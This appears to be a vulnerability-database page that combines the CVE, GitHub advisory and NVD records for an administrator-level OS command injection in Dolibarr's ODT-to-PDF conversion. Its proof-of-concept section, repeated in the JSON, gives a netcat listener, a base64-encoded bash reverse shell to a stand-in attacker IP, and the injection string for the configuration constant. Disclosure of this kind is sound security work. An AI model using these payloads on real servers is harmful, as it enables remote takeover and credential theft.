CVE-2026-23500 (GCVE-0-2026-23500)
Vulnerability from cvelistv5 – Published: 2026-04-17 20:25 – Updated: 2026-04-17 20:25
VLAI?
Title
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
Summary
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.
Severity ?
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"cna": {
"affected": [
{
"product": "dolibarr",
"vendor": "Dolibarr",
"versions": [
{
"status": "affected",
"version": "\u003c 23.0.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "HIGH",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-17T20:25:49.843Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"
},
{
"name": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"
}
],
"source": {
"advisory": "GHSA-w5j3-8fcr-h87w",
"discovery": "UNKNOWN"
},
"title": "Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-23500",
"datePublished": "2026-04-17T20:25:49.843Z",
"dateReserved": "2026-01-13T15:47:41.630Z",
"dateUpdated": "2026-04-17T20:25:49.843Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-23500\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-17T21:16:31.890\",\"lastModified\":\"2026-04-17T21:16:31.890\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
GHSA-W5J3-8FCR-H87W
Vulnerability from github – Published: 2026-04-17 21:24 – Updated: 2026-04-17 21:24
VLAI?
Summary
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
Details
Summary
An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the MAIN_ODT_AS_PDF configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the exec() function in the ODT to PDF conversion process.
Details
The vulnerability is located in htdocs/includes/odtphp/odf.php.
When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the MAIN_ODT_AS_PDF global setting.
Code snippet (htdocs/includes/odtphp/odf.php, approx line 930):
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
While the filename $name is sanitized using escapeshellcmd(), the configuration variable MAIN_ODT_AS_PDF is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like ;) followed by arbitrary commands.
PoC
Prerequisites: 1. Login as an Administrator. 2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.
Steps to reproduce (Reverse Shell):
-
Start a netcat listener on the attacker's machine (IP:
172.26.0.1, Port:4445):bash nc -lvnp 4445 -
Prepare the payload. To avoid issues with special characters (like
&or>) being escaped by the web application or shell, encode the reverse shell command in Base64:bash # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1' echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64 # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK -
Navigate to Home -> Setup -> Other Setup.
-
Add or modify the constant
MAIN_ODT_AS_PDFwith the following injection payload:bash jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash(Explanation:jodconvertersatisfies the initial check,;acts as a command separator, and the pipeline decodes and executes the Base64 payload). -
Navigate to Commerce -> New proposal, create a draft, select an ODT template (e.g.,
generic_proposal_odt), and click Generate. -
Check the netcat listener. A connection will be established, granting a shell on the server:
Impact
Remote Code Execution (RCE).
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically www-data). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).
Credits
Reported by Łukasz Rybak
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "dolibarr/dolibarr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "22.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23500"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-17T21:24:48Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nAn authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\n\n### Details\nThe vulnerability is located in `htdocs/includes/odtphp/odf.php`.\nWhen the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\n\nCode snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):\n```php\n$command = getDolGlobalString(\u0027MAIN_ODT_AS_PDF\u0027).\u0027 \u0027.escapeshellcmd($name);\n// ...\nexec($command, $output_arr, $retval);\n```\n\nWhile the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\n\n### PoC\n**Prerequisites:**\n1. Login as an Administrator.\n2. Ensure the \"Commercial Proposals\" module is enabled and \"ODT templates\" are activated in its setup.\n\n**Steps to reproduce (Reverse Shell):**\n\n1. Start a netcat listener on the attacker\u0027s machine (IP: `172.26.0.1`, Port: `4445`):\n ```bash\n nc -lvnp 4445\n ```\n\n2. Prepare the payload. To avoid issues with special characters (like `\u0026` or `\u003e`) being escaped by the web application or shell, encode the reverse shell command in Base64:\n ```bash\n # Command: bash -c \u0027bash -i \u003e\u0026 /dev/tcp/172.26.0.1/4445 0\u003e\u00261\u0027\n echo \"bash -c \u0027bash -i \u003e\u0026 /dev/tcp/172.26.0.1/4445 0\u003e\u00261\u0027\" | base64\n # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\n ```\n\n3. Navigate to **Home -\u003e Setup -\u003e Other Setup**.\n\n4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\n ```bash\n jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\n ```\n *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\n\u003cimg width=\"1898\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316\" /\u003e\n\n5. Navigate to **Commerce -\u003e New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\n\u003cimg width=\"1907\" height=\"668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242\" /\u003e\n\u003cimg width=\"1858\" height=\"346\" alt=\"image\" src=\"https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7\" /\u003e\n\u003cimg width=\"848\" height=\"183\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\" /\u003e\n\n6. Check the netcat listener. A connection will be established, granting a shell on the server:\n \n\u003cimg width=\"616\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37\" /\u003e\n\n\n### Impact\n**Remote Code Execution (RCE).**\nAn attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\n- Reading sensitive configuration files (database credentials).\n- Modifying application code.\n- Full system compromise depending on server configuration (e.g., docker escape, pivoting).\n\n---\n\n### Credits\nReported by \u0141ukasz Rybak",
"id": "GHSA-w5j3-8fcr-h87w",
"modified": "2026-04-17T21:24:48Z",
"published": "2026-04-17T21:24:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"
},
{
"type": "PACKAGE",
"url": "https://github.com/Dolibarr/dolibarr"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration"
}
FKIE_CVE-2026-23500
Vulnerability from fkie_nvd - Published: 2026-04-17 21:16 - Updated: 2026-04-17 21:16
Severity ?
Summary
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions prior to 23.0.0 , the ODT to PDF conversion process in odf.php concatenates the MAIN_ODT_AS_PDF configuration constant directly into a shell command passed to exec() without sanitization. An authenticated administrator can inject arbitrary OS commands via this constant using command separators, achieving remote code execution as the web server user when any ODT template is generated. This issue has been fixed in version 23.0.0."
}
],
"id": "CVE-2026-23500",
"lastModified": "2026-04-17T21:16:31.890",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-17T21:16:31.890",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Received",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…